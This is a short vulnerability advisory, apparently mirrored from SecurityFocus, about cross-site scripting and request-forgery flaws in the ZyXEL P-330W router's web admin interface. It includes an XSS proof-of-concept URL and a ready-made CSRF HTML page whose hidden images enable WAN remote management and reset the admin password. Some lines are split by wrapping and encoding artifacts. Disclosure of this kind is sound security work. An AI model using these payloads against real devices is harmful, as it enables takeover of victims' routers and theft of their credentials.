27 lines
No EOL
1.4 KiB
Text
27 lines
No EOL
1.4 KiB
Text
source: http://www.securityfocus.com/bid/27024/info
|
||
|
||
ZyXEL P-330W 802.11g Secure Wireless Internet Sharing Router is prone to multiple cross-site scripting vulnerabilities and cross-site request-forgery vulnerabilities because it fails to properly sanitize user-supplied input. These issues affect the device's web-based administrative interface.
|
||
|
||
An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||
|
||
The attacker may leverage the cross-site request-forgery issues to perform actions in the context of a device administrator, which can compromise the device.
|
||
|
||
http://www.example.com:<router_port>/ping.asp?pingstr=â?><script>alert("M
|
||
erry Christams")</script>
|
||
|
||
The following cross-site request-forgery example was provided:
|
||
|
||
<html><head><title>Chirstmastime is Here</title></head><body>
|
||
<img
|
||
src="http://www.example.com:<router_port>/goform/formRmtMgt?webWanAccess
|
||
=ON&remoteMgtPort=80
|
||
80&pingWANEnabled=&upnpEnabled=&WANPassThru1=&WANPassThru2=&WANPassT
|
||
hru3=&
|
||
submit-url=%2Fremotemgt.asp" width="0" height="0">
|
||
<img
|
||
src="http://www.example.com:<router_port>/goform/formPasswordSetup?usern
|
||
ame=admin&newpass=santa_pw
|
||
&confpass=santa_pw&submit-url=%2Fstatus.asp&save=Save" width="0"
|
||
height="0">
|
||
</body>
|
||
</html> |